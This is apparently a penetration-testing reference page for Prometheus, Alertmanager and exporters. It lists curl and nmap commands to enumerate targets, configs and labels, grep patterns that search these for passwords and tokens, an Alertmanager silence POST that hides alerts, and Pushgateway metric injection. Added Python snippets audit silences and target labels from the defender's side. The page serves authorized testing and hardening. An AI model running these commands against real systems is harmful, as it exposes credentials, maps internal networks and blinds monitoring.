Prometheus, Alertmanager and Exporters
Default Ports: 9090 (Prometheus), 9093 (Alertmanager), 9100 (Node Exporter)
Prometheus collects metrics, Alertmanager routes alerts, and exporters expose host or application metrics. In pentests, monitoring endpoints can leak internal targets, hostnames, cloud labels, Kubernetes metadata, URLs, credentials in labels, and operational alerts.
Connect
Prometheus API
The API exposes targets, labels, metrics, and runtime status.
curl http://target.com:9090/-/ready
curl http://target.com:9090/-/healthy
curl 'http://target.com:9090/api/v1/query?query=up'
curl http://target.com:9090/api/v1/targets
Alertmanager API
Alertmanager exposes active alerts, receivers, and silences.
curl http://target.com:9093/-/ready
curl http://target.com:9093/api/v2/alerts
curl http://target.com:9093/api/v2/silences
Exporters
Exporters expose raw metrics for hosts and applications.
curl http://target.com:9100/metrics
curl http://target.com:9115/metrics
curl http://target.com:8080/metrics
Recon
Service Detection with Nmap
Scan common Prometheus, Alertmanager, Pushgateway, and exporter ports.
nmap -p 9090,9091,9093,9100,9115,9121,9187,9200,9308,9404 -sV target.com
nmap -p 9090,9093,9100 --script http-title,http-headers target.com
nmap -p 9090,9093,9100 --open -sV 10.0.0.0/24
Web UI Discovery
The UI quickly confirms exposure and authentication state.
curl -i http://target.com:9090/
curl -i http://target.com:9093/
httpx -l targets.txt -ports 9090,9093,9100,9115,9404 -title -status-code
Metrics Endpoint Discovery
Applications may expose metrics outside default Prometheus ports.
ffuf -u http://target.com/FUZZ -w wordlist.txt -mc all
curl -I http://target.com/metrics
curl -I http://target.com/actuator/prometheus
Enumeration
Target Enumeration
Targets reveal monitored hosts, ports, labels, and scrape paths.
curl http://target.com:9090/api/v1/targets | jq
curl http://target.com:9090/api/v1/service-discovery | jq
Label Enumeration
Labels often reveal environments, clusters, tenants, and cloud metadata.
curl http://target.com:9090/api/v1/labels | jq
curl 'http://target.com:9090/api/v1/label/job/values' | jq
curl 'http://target.com:9090/api/v1/label/instance/values' | jq
Metric Enumeration
Metric names expose applications, databases, queues, and frameworks.
curl http://target.com:9090/api/v1/label/__name__/values | jq
curl 'http://target.com:9090/api/v1/query?query=up' | jq
Config Enumeration
Prometheus config may reveal scrape targets and credentials.
curl http://target.com:9090/api/v1/status/config | jq
curl http://target.com:9090/api/v1/status/flags | jq
Alert Enumeration
Alerts reveal incidents, failing services, and operational routing.
curl http://target.com:9090/api/v1/alerts | jq
curl http://target.com:9093/api/v2/alerts | jq
curl http://target.com:9093/api/v2/receivers | jq
Attack Vectors
Unauthenticated Prometheus
Open Prometheus can disclose internal infrastructure.
curl http://target.com:9090/api/v1/targets | jq
curl http://target.com:9090/api/v1/status/config | jq
Exporter Data Leakage
Exporters may leak host, process, filesystem, or app metadata.
curl http://target.com:9100/metrics | grep -Ei 'node_uname|mount|filesystem|cpu|memory'
curl http://target.com:8080/metrics | grep -Ei 'password|secret|token|url|jdbc|redis|kafka'
Sensitive Labels
Secrets sometimes appear in labels or target metadata.
curl http://target.com:9090/api/v1/targets | grep -Ei 'password|secret|token|apikey|authorization'
curl http://target.com:9090/api/v1/status/config | grep -Ei 'password|secret|token|bearer'
Alertmanager Silence Abuse
If write access is allowed, attackers may hide alerts.
curl -X POST http://target.com:9093/api/v2/silences \
-H 'Content-Type: application/json' \
-d '{"matchers":[{"name":"alertname","value":"TestAlert","isRegex":false}],"startsAt":"2026-01-01T00:00:00Z","endsAt":"2026-01-01T01:00:00Z","createdBy":"pentest","comment":"authorized test"}'
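For the monitoring owner, reading the same endpoint with GET gives a way to spot silences that should not be there. The following is an added example, not part of the original page: the creator allow-list, the 24-hour limit, and the sample records (ids included) are assumptions, and the record `b2` mirrors the silence posted above.

```python
import re
from datetime import datetime, timedelta

CATCH_ALL = {".*", ".+", "^.*$", "^.+$"}

def parse_ts(value):
    """Parse an RFC 3339 timestamp; fractional seconds are dropped (not needed here)."""
    return datetime.fromisoformat(re.sub(r"\.\d+", "", value).replace("Z", "+00:00"))

def review_silences(silences, known_creators, max_duration=timedelta(hours=24)):
    """Return {silence_id: [reasons]} for active or pending silences worth a second look."""
    flagged = {}
    for s in silences:
        if s.get("status", {}).get("state") == "expired":
            continue
        reasons = []
        matchers = s.get("matchers", [])
        if matchers and all(m.get("isRegex") and m.get("value") in CATCH_ALL for m in matchers):
            reasons.append("every matcher is a catch-all regex")
        if parse_ts(s["endsAt"]) - parse_ts(s["startsAt"]) > max_duration:
            reasons.append("duration exceeds limit")
        if s.get("createdBy", "") not in known_creators:
            reasons.append("creator not on the expected list")
        if reasons:
            flagged[s["id"]] = reasons
    return flagged

SAMPLE = [  # constructed records, shaped like a GET /api/v2/silences response
    {"id": "a1", "status": {"state": "active"}, "createdBy": "oncall@example.org",
     "matchers": [{"name": "alertname", "value": "DiskFull", "isRegex": False}],
     "startsAt": "2026-01-01T00:00:00.000Z", "endsAt": "2026-01-01T01:00:00.000Z"},
    {"id": "b2", "status": {"state": "active"}, "createdBy": "pentest",
     "matchers": [{"name": "alertname", "value": "TestAlert", "isRegex": False}],
     "startsAt": "2026-01-01T00:00:00Z", "endsAt": "2026-01-01T01:00:00Z"},
    {"id": "c3", "status": {"state": "pending"}, "createdBy": "",
     "matchers": [{"name": "alertname", "value": ".+", "isRegex": True}],
     "startsAt": "2026-01-01T00:00:00Z", "endsAt": "2026-02-01T00:00:00Z"},
    {"id": "d4", "status": {"state": "expired"}, "createdBy": "",
     "matchers": [{"name": "job", "value": ".*", "isRegex": True}],
     "startsAt": "2025-01-01T00:00:00Z", "endsAt": "2025-06-01T00:00:00Z"},
]

if __name__ == "__main__":
    print(review_silences(SAMPLE, known_creators={"oncall@example.org"}))
```

`createdBy` is supplied by whoever posts the silence, so treat a mismatch as a prompt to investigate rather than as proof of who created it.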
Pushgateway Abuse
Pushgateway may allow metric injection.
echo 'pentest_metric 1' | curl --data-binary @- http://target.com:9091/metrics/job/pentest
curl http://target.com:9091/metrics
Post-Exploitation
Infrastructure Mapping
Use targets and labels to map internal systems.
curl http://target.com:9090/api/v1/targets > prometheus-targets.json
curl http://target.com:9090/api/v1/label/instance/values > prometheus-instances.json
curl http://target.com:9090/api/v1/label/job/values > prometheus-jobs.json
Secret Review
Search configs, targets, and metrics for sensitive values.
grep -Ei 'password|secret|token|apikey|bearer|authorization|jdbc|redis|s3' prometheus-*.json
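For the Sensitive Labels and Secret Review steps, a structured pass over the saved targets response reports which field leaks and why, without copying the secret into the report. This is an added example, not part of the original page: the function names and the sample response are constructed, and the keyword list follows the grep patterns used here.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Same keywords as the grep patterns on this page.
SENSITIVE = re.compile(r"password|secret|token|api_?key|authorization|bearer", re.I)
URL = re.compile(r"[a-z][a-z0-9+.-]*://\S+", re.I)

def url_reasons(value):
    """Reasons a string is sensitive because of a URL inside it."""
    reasons = []
    for raw in URL.findall(value):
        try:
            parts = urlsplit(raw)
        except ValueError:  # malformed URL, e.g. bad IPv6 brackets
            continue
        if parts.password:
            reasons.append("URL embeds a password")
        reasons += [f"URL query parameter '{n}'"
                    for n, _ in parse_qsl(parts.query) if SENSITIVE.search(n)]
    return reasons

def audit_targets(doc):
    """Return (scrape_pool, field, reason) tuples; secret values are never echoed."""
    findings = []
    data = doc.get("data", {})
    for t in data.get("activeTargets", []) + data.get("droppedTargets", []):
        pool = t.get("scrapePool", "?")
        fields = {"scrapeUrl": t.get("scrapeUrl", "")}
        for group in ("labels", "discoveredLabels"):
            for key, value in t.get(group, {}).items():
                fields[f"{group}.{key}"] = value
        for field, value in fields.items():
            name = field.split(".", 1)[-1]
            if field != "scrapeUrl" and value and SENSITIVE.search(name):
                findings.append((pool, field, "sensitive label name"))
            findings += [(pool, field, r) for r in url_reasons(str(value))]
    return findings

# Constructed sample shaped like a GET /api/v1/targets response.
SAMPLE = {"status": "success", "data": {"droppedTargets": [], "activeTargets": [
    {"scrapePool": "node", "scrapeUrl": "http://10.0.0.5:9100/metrics",
     "labels": {"instance": "10.0.0.5:9100", "job": "node"},
     "discoveredLabels": {"__address__": "10.0.0.5:9100"}},
    {"scrapePool": "billing",
     "scrapeUrl": "http://10.0.0.9:8080/metrics?token=EXAMPLE-VALUE",
     "labels": {"job": "billing", "db_url": "postgres://app:example-pw@db:5432/billing"},
     "discoveredLabels": {"__param_token": "EXAMPLE-VALUE"}}]}}
if __name__ == "__main__":
    print(*audit_targets(SAMPLE), sep="\n")
```

To run it on the file saved in the Infrastructure Mapping step, load `prometheus-targets.json` with `json.load` and pass the result to `audit_targets`.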
Alert Review
Alerts show critical systems and active incidents.
curl http://target.com:9090/api/v1/alerts > prometheus-alerts.json
curl http://target.com:9093/api/v2/alerts > alertmanager-alerts.json
Useful Tools
| Tool | Purpose |
|---|---|
| curl | API and metrics checks |
| jq | JSON parsing |
| nmap | Port scanning |
| httpx | UI fingerprinting |
| ffuf | Metrics path discovery |
| grep / rg | Sensitive value search |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| Prometheus exposed | Internal target disclosure |
| Alertmanager exposed | Alert and receiver leakage |
| Exporters exposed | Host and app metadata leakage |
| Config endpoint accessible | Scrape config and token disclosure |
| Sensitive labels | Credential leakage |
| Alert silences writable | Monitoring bypass |
| Pushgateway writable | Metric injection |
| No authentication | Broad monitoring access |